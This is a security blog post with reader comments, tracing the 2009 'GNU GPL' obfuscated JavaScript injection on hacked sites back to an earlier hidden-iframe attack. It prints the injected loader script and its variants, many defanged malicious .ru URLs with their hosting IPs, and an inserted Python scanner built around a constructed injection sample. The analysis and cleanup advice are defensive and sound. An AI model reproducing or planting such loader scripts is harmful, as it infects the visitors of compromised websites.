
From Hidden Iframes to Obfuscated Scripts

   23 Dec 09   Filed in Website exploits

In December, I noticed that the ubiquitous hidden iframes that had been the prevailing site hack this year seemed to be gone. Unmask Parasites now finds them on very few sites. And even on infected sites, I see only old domains, while this attack is known for introducing at least one new domain every day and for frequently updating the iframe code on infected sites.

At the same time I noticed a new type of obfuscated scripts injected into hacked websites. And I believe it’s a new incarnation of the same attack that previously injected hidden iframes.

Here’s the story

A few weeks ago I stumbled upon an infected site with the following script:

/*GNU GPL*/ try{window.onload = function(){var Dlo228l8u771kzw = document.createElement('script');Dlo228l8u771kzw.setAttribute('type', 'text/javascript');Dlo228l8u771kzw.setAttribute('id', 'myscript1');Dlo228l8u771kzw.setAttribute('src', 'h@(t#t^^!p#&:@^$(/$/(j^#^o^o(#$m&)$l$(@!#a$^-!&^$)o@@r##!!g^!(^.$$^s))$p(@(a@@n@)#k^@#w&)i#$r(e(.$!&#c!@o!^()!m#.!&w())3(^@s$&^c$)h&(o#!o&#l&@s!^&-(c#o(#)m@$.&(e$@&!a^s(y(t(a$(^)b)!&l&e@!t(e)(n!n$#)i^(^!s@.^(r^#^$u(#:&8^$)0)^#8^(!0^/!#g##@$$o&o#$g#l!e^($.(@c#o^!)m@/(g&$^o(@o$#(^g($l!e@.##c$)$(o$)!!m^$/($!b!)$)i$n#(g)!.^!c((@&@o^$m)$)/&!&g$(($o)o)@((g#&&l(!e@$.(f($)^&r@&!#/!w@(o(^!r)d()$!#p)!^r(e@#s&)!s(^!@.^(&o$#@r((g^/^^@'.replace(/\!|@|&|\)|\$|\(|#|\^/ig, ''));Dlo228l8u771kzw.setAttribute('defer', 'defer');document.body.appendChild(Dlo228l8u771kzw);}} catch(e) {}

When I deobfuscated it, it made me laugh. This script injected a hidden iframe with the following “src” attribute:

hxxp://joomla-org.spankwire.com.w3schools-com.easytabletennis .ru:8080/google.com/google.com/bing.com/google.fr/wordpress.org/

This looked like overkill. These guys wanted their script to look trustworthy so badly that they not only prepended the GNU GPL comment to the script but also packed reputable site names into the iframe address:

  • joomla-org
  • spankwire.com
  • w3schools-com
  • google.com (2 times!)
  • bing.com
  • google.fr
  • wordpress.org

However all these “brand names” are just subdomains and subdirectories on the malicious site easytabletennis .ru.

Variations

I’ve seen many other similarly infected websites since then. They all had this “GNU GPL” script at the bottom of web pages. However, the script itself changes constantly. The most prominent variation is the /*CODE1*/ comment instead of /*GNU GPL*/. Another change is the addresses of the injected hidden iframes. Here are just a few of them:

hxxp://gamer-com-tw.wrzuta.pl.play-com.brownbagbar .ru:8080/google.com/google.com/wordpress.org/hp.com/surveymonkey.com/
hxxp://xtube-com.blogger.com.pornorama-com.bluejackmusic .ru:8080/hdfcbank.com/hdfcbank.com/google.com/fanpop.com/in.com/
hxxp://clicksor-com.eastmoney.com.mobile-de.homesaleplus .ru:8080/ocn.ne.jp/ocn.ne.jp/classmates.com/linkhelper.cn/google.com/
hxxp://google-com-do.insightexpressai.com.dtiblog-com.greatsalecenter .ru:8080/gsmarena.com/gsmarena.com/metrolyrics.com/qidian.com/google.com/
hxxp://tweetmeme-com.rediff.com.google-com-bd.simpleworldhouse .ru:8080/google.com/google.com/dreamstime.com/att.net/shinobi.jp/
hxxp://php-net.indeed.com.cyworld-com.simpleworldhouse .ru:8080/ebay.com/ebay.com/google.com/blogger.com/myspace.com/
hxxp://yesky-com.naukri.com.thepiratebay-org.viewhomesale .ru:8080/clicksor.com/clicksor.com/guardian.co.uk/google.com/filehippo.com/
hxxp://chip-de.ggpht.com.deezer-com.viewhomesale .ru:8080/google.com/google.com/timeanddate.com/avg.com/zshare.net/
hxxp://wowhead-com.gougou.com.redtube-com.viewhomesale .ru:8080/58.com/58.com/google.com/rediff.com/uol.com.br/
hxxp://it168-com.sky.com.xe-com.viewhomesale .ru:8080/google.com/google.com/pagesjaunes.fr/sify.com/nate.com/
hxxp://seznam-cz.king.com.boston-com.viewhomesale .ru:8080/linkedin.com/linkedin.com/google.com/myfreepaysite.com/stc.com.sa/
hxxp://cbssports-com.google.co.th.literotica-com.viewhomesale .ru:8080/google.com/google.com/mobile9.com/linezing.com/blogger.com/
hxxp://m-w-com.google.at.twitpic-com.mygreatsale .ru:8080/google.com/google.com/cncmax.cn/zaobao.com/37wan.com/
hxxp://clicksor-com.eastmoney.com.mobile-de.homesaleplus .ru:8080/ocn.ne.jp/ocn.ne.jp/classmates.com/linkhelper.cn/google.com/
hxxp://yelp-com.56.com.orkut-com-br.themobisite .ru:8080/priceminister.com/priceminister.com/google.com/engadget.com/jeuxvideo.com/
hxxp://naqigs-com.break.com.etsy-com.votrelib .ru:8080/bloomberg.com/bloomberg.com/mlb.com/google.com/google.com.eg/
hxxp://way2sms-com.plala.or.jp.wikihow-com.sugaryhome .ru:8080/google.com/google.com/qq.com/google.com.mx/orkut.com.br/
hxxp://as-com.scribd.com.gazeta-pl.musicboxpro .ru:8080/google.com/google.com/39.net/51.com/atwiki.jp/
hxxp://google-cn.msn.ca.shoplocal-com.easymusicstore .ru:8080/interia.pl/interia.pl/google.com/empflix.com/debonairblog.com/
hxxp://live.com.google.com.baidu-msn.com.bestartsale .ru:8080/wordpress.com/google-mail.it/livejasmin-photobucket.com/cnet-cnn.com/about-ebay.com/

It looks like the purpose of these ridiculous addresses is to

  • confuse some malware scanners that may consider a script trustworthy when they encounter a trusted domain (e.g. google.com) in the iframe “src” parameter
  • reuse the same domain name while reducing the risk of being blacklisted (when malware scanners blacklist the full addresses of known malicious iframes rather than the domain). For example, in the above list you can see 6 different addresses on the viewhomesale .ru site. This is more economical (crisis?) than throwing a domain name away after a single use to avoid blacklisting. (Of course, this doesn’t work with Google, which blacklists the topmost domain.)

Update (Jan 10, 2009): There is a new modification of the malicious script.

/*LGPL*/ try{ window.onload = function(){var Siqonuqvd07 = document.createElement('s(c^^$r^^i))#(p)$t@^!'.replace(/@|\^|\)|&|\(|#|\!|\$/ig, '')); ....

Now, instead of GNU GPL, it uses LGPL (do they really specify licenses? ;-) ) and slightly heavier obfuscation: even the 'script' tag name is now assembled with the same replace() trick. Once deobfuscated, the rest is the same.

Common features

I have also noticed that these “GNU GPL” scripts are often encountered on websites infected with Gumblar. This means that stolen FTP credentials are the most probable vector of the site infection.

When I found time to inspect these scripts more thoroughly, I figured that they were direct successors of the hidden iframes that I wrote about so much this year. Here is what they have in common:

  • use of port 8080
  • frequently changing .ru domains
  • it looks like only web pages with predefined file names are infected (those whose names contain “index”, “home” or “default”); this time, though, not only web pages are being infected (see below)
  • nginx web server on port 8080 on the malicious sites
  • Legitimate content on port 80 served by Apache.
  • Each malicious domain is mapped to 5 different IPs (fail-proof setup plus load balancing)

You can see all current IPs of the malicious sites using the dig command. Here is its current output:

bluejackin.ru. 432 IN A 95.211.10.130
bluejackin.ru. 432 IN A 91.121.166.221
bluejackin.ru. 432 IN A 91.121.211.226
bluejackin.ru. 432 IN A 94.23.4.164
bluejackin.ru. 432 IN A 95.211.4.193

This set of 5 IPs is not static; some of them change from time to time. The IPs belong to hacked legitimate dedicated and virtual dedicated servers.

Leaseweb and OVH: safe harbors for hackers?

One interesting observation: lately, all those IPs have belonged to the networks of two European hosting providers: Leaseweb (Netherlands) and OVH.com (France).

  • 82.192.88.35 – Netherlands Amsterdam Leaseweb
  • 91.121.49.129 – France Paris Ovh Sas
  • 91.121.166.221 – France Ovh Sas
  • 91.121.211.226 – France Paris Ovh Sas
  • 94.23.4.164 – France Ovh Sas
  • 94.23.206.229 – France Ovh Sas
  • 95.211.4.193 – Netherlands Amsterdam Leaseweb
  • 95.211.10.130 – Netherlands Amsterdam Leaseweb

Is it a coincidence, or does something attract hackers to LeaseWeb and OVH?

As I know from my previous investigation, the nginx servers on port 8080 on the hacked sites are just reverse proxies that hide the central malicious server, which contains all the exploits. Mdvhost .com has been used as this main server for the iframe attack. It serves the malicious content on port 4480.

I decided to check mdvhost .com now. This time it returned an obfuscated JavaScript similar to those loaded into the malicious iframes with long ridiculous addresses. When I deobfuscated it, I found a reference to “joomla-org.spankwire.com.w3schools-com.easytabletennis .ru:8080” – clear evidence that these new obfuscated scripts use mdvhost .com and are just successors of the infamous iframe attack.

The mdvhost .com domain is mapped to 2 IP addresses, 95 .211 .98 .141 and 95 .211 .98 .142, which are also used as its name servers (ns1.mdvhost .com and ns2.mdvhost .com). It won’t come as a surprise that this site is also on the Leaseweb network. Back in September, Leaseweb had been contacted via Stopbadware.org about this malicious site on their network. No reaction followed. Is this a sign that they don’t care that they host the central malicious server of a malware attack that has infected millions of computers and hundreds of thousands of websites?

Update (Dec 30, 2009): LeaseWeb’s Security Officer has responded to this post, and now all the malicious servers seem to have been removed from the LeaseWeb network.

Back to the malware attack

Now that we know that the attack uses the same techniques and the same servers, I guess the rest remains pretty much the same: the same way of hacking websites (stolen FTP credentials) and the same exploit files that use vulnerabilities in Flash and Adobe Reader (or maybe updated versions that exploit new unpatched vulnerabilities in Adobe products – I leave this to malware researchers).

What is different?

  • Obfuscated script instead of hidden iframes.
  • Not only do they inject the script at the bottom of web pages, they also inject it at the bottom of .js files.

To webmasters:

Since it’s a successor of the known iframe attack that uses stolen FTP credentials, all the clean up and prevention instructions should be pretty much the same.

  • Scan your local PC for malware
  • Make sure your software is up-to-date (Windows, web browser, browser plugins, such as Flash, Adobe Reader, Java, QuickTime, etc) – highly recommended.
  • Once your PC is clean, change all site passwords and keep them secure. Don’t save them in FTP programs (the malware behind this attack steals FTP credentials directly from program settings)
  • Replace all infected files with their clean copies from a backup (Or just remove everything and then restore the whole site from a backup to be on the safe side)
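The file check above, together with the deobfuscation step from the start of the post, as an added example (not the post's own code and not a tool from Unmask Parasites): a small Python scanner that finds the marker-plus-try{ pattern in .html and .js files, recovers the hidden URL by applying the script's own replace() character set statically instead of executing any JavaScript, and reduces the host to the attacker's registrable domain, which is the part worth blocking. The sample file, the variable name Zq1 and the decoy labels in its URL are constructed, and registrable_domain() assumes a two-label suffix.

```python
import re
from dataclasses import dataclass, field
from pathlib import Path
from urllib.parse import urlsplit

# Comment markers the post reports at the head of the injected script.
MARKER_RE = re.compile(r"/\*\s*(GNU GPL|CODE1|LGPL)\s*\*/\s*try\s*\{")

# The script's self-decoding idiom:  'noisy text'.replace(/a|b|\c/ig, '')
OBF_CALL_RE = re.compile(r"'([^']*)'\.replace\(/((?:\\.|[^/])+)/ig,\s*''\)")


def noise_chars(js_alternation):
    """Turn the JS regex body (an alternation of single, possibly escaped,
    punctuation characters) into the set of characters it deletes."""
    chars = set()
    for branch in js_alternation.split("|"):
        if branch.startswith("\\"):
            branch = branch[1:]
        if len(branch) != 1:
            raise ValueError("unexpected regex branch: %r" % branch)
        chars.add(branch)
    return chars


def decode(noisy, js_alternation):
    """Do statically what .replace(/.../ig, '') would do at runtime, so the
    payload URL is recovered without executing any of the injected code."""
    drop = noise_chars(js_alternation)
    return "".join(c for c in noisy if c not in drop)


def registrable_domain(host):
    """Last two labels of the host. Everything in front of them (google.com,
    w3schools-com, ...) is decoy; only this part identifies the attacker's
    site, so this is the value worth blocking or reporting.
    Simplification: multi-label public suffixes such as co.uk are not handled."""
    return ".".join(host.split(".")[-2:])


def describe(url):
    """Split a decoded payload URL into the parts a report needs."""
    parts = urlsplit(url)
    return {"host": parts.hostname, "port": parts.port,
            "domain": registrable_domain(parts.hostname)}


@dataclass
class Finding:
    marker: str                                   # GNU GPL, CODE1 or LGPL
    decoded: list = field(default_factory=list)   # every decoded literal
    urls: list = field(default_factory=list)      # the ones that are URLs


def scan_source(source):
    """Return one Finding per marker+try{ block in the text. Each block is
    read only up to its catch, and every obfuscated literal inside it is
    decoded (the LGPL variant also hides the word 'script' this way)."""
    findings = []
    markers = list(MARKER_RE.finditer(source))
    for i, m in enumerate(markers):
        end = markers[i + 1].start() if i + 1 < len(markers) else len(source)
        block = source[m.start():end]
        catch_at = block.find("catch")
        if catch_at != -1:
            block = block[:catch_at]
        f = Finding(marker=m.group(1))
        for noisy, alternation in OBF_CALL_RE.findall(block):
            text = decode(noisy, alternation)
            f.decoded.append(text)
            if text.startswith(("http://", "https://")):
                f.urls.append(text)
        findings.append(f)
    return findings


def scan_tree(root, exts=(".html", ".htm", ".php", ".js")):
    """Walk a downloaded copy of the site; .js files matter as much as pages."""
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            for f in scan_source(path.read_text(errors="replace")):
                yield path, f


# Constructed sample: a harmless menu script with the injection appended,
# in the shape the post shows (variable name and URL labels made up here).
SAMPLE_JS = r"""function showMenu(id){document.getElementById(id).style.display='block';}
/*GNU GPL*/ try{window.onload = function(){var Zq1 = document.createElement('script');Zq1.setAttribute('type', 'text/javascript');Zq1.setAttribute('id', 'myscript1');Zq1.setAttribute('src', 'h@t#t^p$:(/)/@j#o^o$m(l)a@-#o^r$g(.)w@3#s^c$h(o)o@l#s^-$c(o)m@.#e^a$s(y)t@a#b^l$e(t)e@n#n^i$s(.)r@u#:^8$0(8)0@/#g^o$o(g)l@e#.^c$o(m)/@b#i^n$g(.)c@o#m^/$'.replace(/@|#|\^|\$|\(|\)/ig, ''));Zq1.setAttribute('defer', 'defer');document.body.appendChild(Zq1);}} catch(e) {}
"""

if __name__ == "__main__":
    for finding in scan_source(SAMPLE_JS):
        for url in finding.urls:
            print(finding.marker, describe(url))
```

Run it over a downloaded copy of the site with scan_tree(path) rather than grep alone: the marker tells you which files are hit, and the decoded domain is what to block and report.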

Have your say

Did I miss anything? Don’t hesitate to post your comments and corrections here.

By the way, Happy Holidays!

Reader's Comments (52)

  1. |

    [...] This post was mentioned on Twitter by Denis, Oscar. Oscar said: RT @unmaskparasites: [blog] From Hidden Iframes to Obfuscated Scripts http://bit.ly/5qMAzk – *GNU GPL* mal-scripts + rogue servers on Le … [...]

  2. |

    I want to thank you for all the work you are doing in investigating, documenting and warning about this sort of criminal behaviour.

    The company I work for was hit by this sort of thing a couple of months ago and it has fallen to me to pick up the pieces – iframe-style injection of code pointing to a Russian malware site (flagged by Google). It is both painful and scary.

    I now keep a close watch and subscribe to your site!

    Thanks again!

    Alastair

  3. |

    Hi,

    I’m LeaseWeb’s Security Officer and therefore responsible for handling abuse.

    First, please let me introduce LeaseWeb. We are a dedicated hosting provider with approx. 22,000 servers in use, which generate 500+ Gbps of peak traffic. We provide hardware, housing and a reliable internet connection for an ‘unbeatable’ price. We do not provide managed hosting whereby we do system administration; this is left as a task for our customers. As most customers are internet professionals (like resellers), this works very well.

    As to our abuse handling:
    When we receive an abuse notification about an IP address, we will forward the notification to our reseller with a 24-hour response time. For malware/phishing sites we use a shorter limit. If the reseller/customer fails to respond, we normally will null the IP until the customer has contacted us and assures us he will remove the offending site/code.

    As a rule we do not communicate with the person who sends us the abuse notification, so not receiving a reply does not indicate that LeaseWeb has not received the notification or isn’t taking action on it.

    If you have any questions please mail me at
    a.dejoode-at-leaseweb.com.

    Thanks.

    Alex de Joode
    Security Officer
    LeaseWeb BV

    • |

      Hi Alex,

      Thanks for taking time to respond.

      I completely understand that you don’t manage servers yourselves. At the same time your TOS should prohibit your customers from using servers for illegal activities.

      And it’s OK not to receive a response for abuse notifications. However, I don’t see any action against mdvhost .com which is still hosted on the same two IPs on your network (the abuse report was in September).

      I hope you’ll now take action against the IP addresses mentioned in this post (I believe the servers are hacked and the hackers have installed nginx on port 8080 to work as a reverse proxy for mdvhost .com or maybe some other sites).

  4. |

    Great post Denis.

    Since publishing detection for this we have several hundred sites infected. If I get time I will update our blog with more information :)

    http://www.sophos.com/blogs/sophoslabs/v/post/8046

  5. |

    Please check my article about this issue:

    hxxp://justcoded.com/article/gumblar-family-virus-removal-tool/

  6. |

    [...] of 24/12 – 23H00] Much more info here Tags: Blog, fail, security Share this [...]

  7. |

    [...] is via compromised FTP credentials. My colleague over at the Unmask Parasites. Blog has also reported seeing large numbers of sites [...]

  8. |

    [...] Apparently, the infection came from malware on my PC that used my FTP client to spread. [...]

  9. |

    I want to thank you for this article!

    Just a week ago my website was hacked in this manner.

    After reading your article, I started searching the web pages that visitors got a malware warning on. I just could not find the special script mentioned in your article in any of those web pages.

    I downloaded my whole website to my hard drive. I did a search on all the files for the phrase “GNU GPL”. There it was in the fw_menu.js file. I forgot all about this file. It runs the side menu bar for the web site. That is why the warning message showed up all over the place for visitors. Most of the web pages access that file.

    I have uploaded a correct version of the fw_menu.js file to my website.

    You are my hero!

    cindy

  10. |

    They are now also using:

    hxxp://118114-cn.google.ie.abc-go-com.mygreatsale .ru:8080/novinky.cz/novinky.cz/imagefap.com/play.com/google.com/

    Many thanks for the blogpost, and I would also like to thank LeaseWeb for their statement (being a LW customer I really appreciate the response).

  11. |

    WHERE IS THE fw_menu.js ON A JOOMLA SITE

    I downloaded my whole website to my hard drive. I did a search on all the files for the phrase “GNU GPL”. There it was in the fw_menu.js file.
    —–
    Edit by Denis: I removed your site link from your signature because the site is still hacked (I see cloaked spammy content)


  13. |

    Thanks everyone.

    We have been having a discussion on this virus in this thread as well. My posts specifically show what we have narrowed down on the user machine (what this iframe virus will launch if successful) for what we believe is a rootkit PSW.OnlineGames virus which isn’t being picked up by any of the major programs without some effort….

    http://www.bleuken.com/2009/12/20/fixing-gnu-gpl-virusmalware/

  14. |

    Hello,

    Some more …


  15. |

    Welcome, … somehow my post got in twice.

  16. |

    [...] Tarmo Randel from CERT.EE warns web administrators about a malicious script whose spread in Estonia has already taken on the look of a pandemic and has infected, among others, ERR’s websites. A more detailed description of the pest can be read here. [...]

  17. |

    [...] Looking at this overseas blog that reports on the details, wow, it really is well made. [...]


    hxxp://thesun-co-uk.brothersoft.com.usatoday-com.sugaryhome.ru:8080/kino.to/kino.to/google.com/slutload.com/seriesyonkis.com/
    hxxp://travelocity-com.google.co.za.vnexpress-net.xboxliveweb.ru:8080/google.com/google.com/robtex.com/slickdeals.net/fc2.com/
    hxxp://tudou-com.ifolder.ru.adsrevenue-net.worldwebworld.ru:8080/woot.com/woot.com/dtiblog.com/google.com/answers.com/
    hxxp://univision-com.king.com.toysrus-com.carswebnet.ru:8080/monografias.com/monografias.com/google.com/ultimate-guitar.com/iciba.com/
    hxxp://verizon-net.baidu.com.bahn-de.webdesktopnet.ru:8080/google.com/google.com/tnaflix.com/mtime.com/google.com.tw/
    hxxp://watch-movies-online-tv.nate.com.technorati-com.thelaceweb.ru:8080/torrentreactor.net/torrentreactor.net/google.com/picfoco.com/chinaz.com/
    hxxp://wellsfargo-com.w3.org.it168-com.thechocolateweb.ru:8080/360buy.com/360buy.com/google.com/wiktionary.org/51yes.com/
    hxxp://wellsfargo-com.yandex.ua.freshwap-net.webnetenglish.ru:8080/letitbit.net/letitbit.net/toysrus.com/daqi.com/google.com/
    hxxp://wiktionary-org.ameba.jp.freeones-com.thelaceweb.ru:8080/bu520.com/bu520.com/businessweek.com/scribd.com/google.com/
    hxxp://xici-net.infoseek.co.jp.wellsfargo-com.thelaceweb.ru:8080/google.com/google.com/sponichi.co.jp/megaclick.com/ipicture.ru/
    hxxp://zappos-com.blackhatworld.com.dailymail-co-uk.thechocolateweb.ru:8080/acer.com/acer.com/google.com/vnexpress.net/petardas.com/

  20.

    Hello, this is great information. May I ask how you find out the hidden iframe link from the src attribute?

  21.

    hxxp://amazon-co-uk.skyrock.com.about-com.webnetenglish.ru:8080/google.com/google.com/foxsports.com/gc.ca/dell.com/
    hxxp://boston-com.symantec.com.cocolog-nifty-com.worldwebworld.ru:8080/msn.ca/msn.ca/iwiw.hu/google.com/yoka.com/
    hxxp://ebay-fr.blackhatworld.com.webmd-com.webnetenglish.ru:8080/hi5.com/hi5.com/google.com/windowslive.com/tomshardware.com/
    hxxp://google-cl.badoo.com.tinypic-com.carswebnet.ru:8080/google.co.za/google.co.za/bebo.com/google.com/cbssports.com/
    hxxp://hc360-com.webmasterworld.com.ning-com.worldwebworld.ru:8080/beemp3.com/beemp3.com/55bbs.com/xe.com/google.com/
    hxxp://microsoft-com.ning.com.megaupload-com.carswebnet.ru:8080/badoo.com/badoo.com/mobile.de/google.com/fishki.net/
    hxxp://mlb-com.heise.de.tiscali-it.thechocolateweb.ru:8080/adult-empire.com/adult-empire.com/ig.com.br/google.com/badjojo.com/
    hxxp://orkut-com-br.hattrick.org.wiktionary-org.webnetenglish.ru:8080/google.com/google.com/intel.com/vnet.cn/onlinedown.net/
    hxxp://sfgate-com.meetup.com.aol-com.worldwebworld.ru:8080/miniclip.com/miniclip.com/xbox.com/google.com/google.it/
    hxxp://veoh-com.wunderground.com.ifeng-com.worldwebworld.ru:8080/ovh.net/ovh.net/zaycev.net/google.com/orf.at/

  22.

    hxxp://amazon-fr.skype.com.ya-ru.thelaceweb.ru:8080/39.net/39.net/google.com/gc.ca/rk.com/
    hxxp://detiknews-com.pchome.net.novinky-cz.webdesktopnet.ru:8080/windowslive.com/windowslive.com/shopping.com/bing.com/google.com/
    hxxp://digg-com.uwants.com.livescore-com.whosaleonline.ru:8080/sciencedirect.com/sciencedirect.com/google.com.hk/google.com/infolinks.com/
    hxxp://docstoc-com.zappos.com.realitykings-com.webdesktopnet.ru:8080/pch.com/pch.com/comcast.net/google.com/hi5.com/
    hxxp://ebay-de.adserverplus.com.sify-com.thelaceweb.ru:8080/in.com/in.com/zedo.com/sweetim.com/google.com/
    hxxp://en-wordpress-com.staples.com.multiupload-com.webnetenglish.ru:8080/eastmoney.com/eastmoney.com/google.com/robtex.com/abc.go.com/
    hxxp://facebook-com.mixi.jp.wareseeker-com.usaworldwideweb.ru:8080/google.co.ma/google.co.ma/110mb.com/gougou.com/google.com/
    hxxp://free-fr.rapidshare.com.hotlinkimage-com.thechocolateweb.ru:8080/51job.com/51job.com/redtube.com/gittigidiyor.com/google.com/
    hxxp://gizmodo-com.ovh.net.download-com.thelaceweb.ru:8080/theplanet.com/theplanet.com/fedex.com/google.com/go.com/
    hxxp://iza-ne-jp.persianblog.ir.seriesyonkis-com.webnetenglish.ru:8080/google.com/google.com/yallakora.com/sabah.com.tr/orange.fr/
    hxxp://marketwatch-com.atdmt.com.craigslist-ca.thelaceweb.ru:8080/lemonde.fr/lemonde.fr/pixnet.net/google.com/elmundo.es/
    hxxp://meinvz-net.mihanblog.com.verizonwireless-com.thelaceweb.ru:8080/capitalone.com/capitalone.com/booking.com/google.com/bizrate.com/
    hxxp://metrolyrics-com.google.co.in.google-co-th.thechocolateweb.ru:8080/ucoz.ru/ucoz.ru/sohu.com/freelotto.com/google.com/
    hxxp://miibeian-gov-cn.amazon.fr.ticketmaster-com.webdesktopnet.ru:8080/pichunter.com/pichunter.com/google.com/pch.com/uploaded.to/
    hxxp://mixx-com.kinopoisk.ru.gmodules-com.worldwebworld.ru:8080/sulekha.com/sulekha.com/mihanblog.com/google.com/stumbleupon.com/
    hxxp://mybrowserbar-com.samsung.com.nasa-gov.egreatsale.ru:8080/megavideo.com/megavideo.com/laredoute.fr/bild.de/google.com/
    hxxp://naqigs-com.dmm.co.jp.reddit-com.worldwebworld.ru:8080/google.com/google.com/thefreedictionary.com/megavideo.com/plentyoffish.com/
    hxxp://nih-gov.miibeian.gov.cn.craigslist-ca.sugaryhome.ru:8080/cyworld.com/cyworld.com/archive.org/google.com/comdirect.de/
    hxxp://onemanga-com.ticketmaster.com.plala-or-jp.worldwebworld.ru:8080/classmates.com/classmates.com/boston.com/google.com/huanqiu.com/
    hxxp://orange-fr.tudou.com.youtube-com.webnetenglish.ru:8080/pichunter.com/pichunter.com/google.com/marketwatch.com/forumcommunity.net/
    hxxp://pornhub-com.perezhilton.com.goo-ne-jp.thechocolateweb.ru:8080/google.com/google.com/bangbros1.com/sponichi.co.jp/onet.pl/
    hxxp://rakuten-ne-jp.overstock.com.pixnet-net.thelaceweb.ru:8080/mercadolibre.com.ar/mercadolibre.com.ar/partypoker.com/google.com/linezing.com/
    hxxp://rincondelvago-com.tabnak.ir.hyves-nl.webnetenglish.ru:8080/squidoo.com/squidoo.com/google.com/orbitdownloader.com/news.com.au/
    hxxp://rivals-com.tagged.com.dreamstime-com.thelaceweb.ru:8080/google.com/google.com/slutload.com/match.com/alibaba.com/
    hxxp://sakura-ne-jp.nasa.gov.39-net.webdesktopnet.ru:8080/ca.gov/ca.gov/google.com/songs.pk/echoroukonline.com/
    hxxp://shaadi-com.free.fr.stc-com-sa.funwebmail.ru:8080/libero.it/libero.it/msn.ca/orkut.com/google.com/
    hxxp://soso-com.linkwithin.com.360-cn.worldwebworld.ru:8080/cmbchina.com/cmbchina.com/google.com/cams.com/zol.com.cn/
    hxxp://vnexpress-net.9wee.com.perezhilton-com.worldwebworld.ru:8080/google.com/google.com/radikal.ru/ynet.com/hotfile.com/
    hxxp://who-is.yomiuri.co.jp.archive-org.thelaceweb.ru:8080/allyes.com/allyes.com/adultfriendfinder.com/liveinternet.ru/google.com/
    hxxp://wikipedia-org.smashingmagazine.com.foodnetwork-com.easytabletennis.ru:8080/19lou.com/19lou.com/google.com/zappos.com/avast.com/
    hxxp://wrzuta-pl.besttubeclips.com.jrj-com-cn.funwebmail.ru:8080/seesaa.net/seesaa.net/google.com/fixya.com/virginmedia.com/

  23.

    Hey,

    I wanted to know how you deobfuscated the script.
    I tried with Malzilla but it didn't do it; maybe I did something wrong.

    •

      The scripts are very lightly obfuscated. I just check the value assigned to the “src” parameter.

      If you tried to deobfuscate the script in this article, note that I slightly garbled it to make it harmless.

  24.

    hxxp://adbrite-com.1e100.net.petardas-com.carswebnet.ru:8080/google.sk/google.sk/basecamphq.com/google.com/accuweather.com/
    hxxp://amazon-de.kinopoisk.ru.marketwatch-com.thechocolateweb.ru:8080/google.com/google.com/ebay.fr/mysql.com/foxnews.com/
    hxxp://bild-de.zedge.net.qip-ru.thelaceweb.ru:8080/tabelog.com/tabelog.com/repubblica.it/cnet.com/google.com/
    hxxp://clicksor-com.eastmoney.com.mobile-de.homesaleplus.ru:8080/ocn.ne.jp/ocn.ne.jp/classmates.com/linkhelper.cn/google.com/
    hxxp://cnzz-com.play.com.detik-com.thechocolateweb.ru:8080/babylon.com/babylon.com/google.com/reddit.com/ninemsn.com.au/
    hxxp://doctissimo-fr.news.com.au.accuweather-com.worldwebworld.ru:8080/google.com/google.com/persianblog.ir/xunlei.com/zappos.com/
    hxxp://hoopchina-com.it168.com.drudgereport-com.thechocolateweb.ru:8080/xvideos.com/xvideos.com/google.com/laredoute.fr/orbitz.com/
    hxxp://ibm-com.lowes.com.wowarmory-com.worldwebworld.ru:8080/pantip.com/pantip.com/google.com/intel.com/dantri.com.vn/
    hxxp://irctc-co-in.rapidshare.com.skyrock-com.thechocolateweb.ru:8080/brazzers.com/brazzers.com/photobucket.com/ovguide.com/google.com/
    hxxp://linezing-com.thepiratebay.org.gazeta-pl.thechocolateweb.ru:8080/novinky.cz/novinky.cz/empflix.com/narod.ru/google.com/
    hxxp://nowdownloadall-com.costco.com.travelocity-com.thelaceweb.ru:8080/aol.com/aol.com/pconline.com.cn/google.com/rian.ru/
    hxxp://radikal-ru.nydailynews.com.tianya-cn.greatwebradio.ru:8080/break.com/break.com/google.com.ec/google.com/novoteka.ru/
    hxxp://softlayer-com.capitalone.com.google-co-th.viewhomesale.ru:8080/conduit.com/conduit.com/passport.net/google.com/att.com/
    hxxp://sponsorads-de.58.com.abc-go-com.thelaceweb.ru:8080/google.com/google.com/informer.com/fling.com/addictinggames.com/
    hxxp://webs-com.gutefrage.net.bigpoint-com.worldwebworld.ru:8080/w3.org/w3.org/google.com/freewebs.com/priceminister.com/
    hxxp://wer-kennt-wen-de.google.pt.match-com.worldwebworld.ru:8080/imeem.com/imeem.com/google.com/cam4.com/google.com.ua/
    hxxp://woot-com.xbox.com.orkut-co-in.thechocolateweb.ru:8080/google.co.ma/google.co.ma/google.com/rapid4me.com/samsung.com/
    hxxp://wrzuta-pl.y8.com.alot-com.worldwebworld.ru:8080/taobao.com/taobao.com/google.com/marktplaats.nl/ovguide.com/
    hxxp://xcar-com-cn.37wan.com.58-com.webnetenglish.ru:8080/msn.ca/msn.ca/dailymotion.com/google.com/letitbit.net/

    •

      Thanks.

      I guess that is enough full URLs. It makes sense to only post new .ru domains here, e.g.
      webnetenglish .ru
      thechocolateweb .ru
      etc.

  25.

    I was just wondering how you got this link easytabletennis .ru from the JavaScript, but now I understand the src attribute just had other special characters to hide the link. Thanks!

  26.

    [...] From Hidden Iframes to Obfuscated Scripts | Unmask Parasites. Blog. [...]

  27.

    [...] http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/ [...]

  28.

    Code changed two times already last night. Sample as follows:
    —snip—
    /*Exception*/ document.write('');

    —snap—

    Have posted full URLs over at malwaredomainlist.

    Cheers,
    micha

  29.

    Whoops, that didn’t quite work. Another try without certain special chars:
    script /*Exception*/ document.write( script src= + h&##&x#!(x()p$^&:(/&!/@(s#(#)e((^#a)!&^r@&s^&!-((c(#o^@&m^$@.^)(m(@&o$)^p)()#.@@c)&o@&m@#.!^k$##a$@@@i^@!)x!^#i^n^)@@!-$c!^@&o$&m!^).#&)g)^^^e$@@n(&^$u$#i#(n@e#c#$o#&l^!^o!!r&^^@&s#&$.@r$(#^u##&!:&!(8#$0(^8$&0$$/@&(i!(c(!)i!!!o(^^.#)!u##)(s!&)/)@@i$(c$$$^i^^o(^#.@&u$!s^)/@&!w&!$h!o()(.@#&i$!@@s)/^!(s^(z)#@#n$!.)$@c(#z$)#^/#g)&o(o&#g!l)e^(!.$!)c)(o(^!m!)&/^&@) .replace(/#|@|&|\)|\!|\^|\(|\$/ig, )+ defer=defer /scr + ipt ); /script
    !–ac9d81dd3e188c20195d91ac83ea09ef–

    •

      A client just reported the same thing this morning as well. The domain in use was:
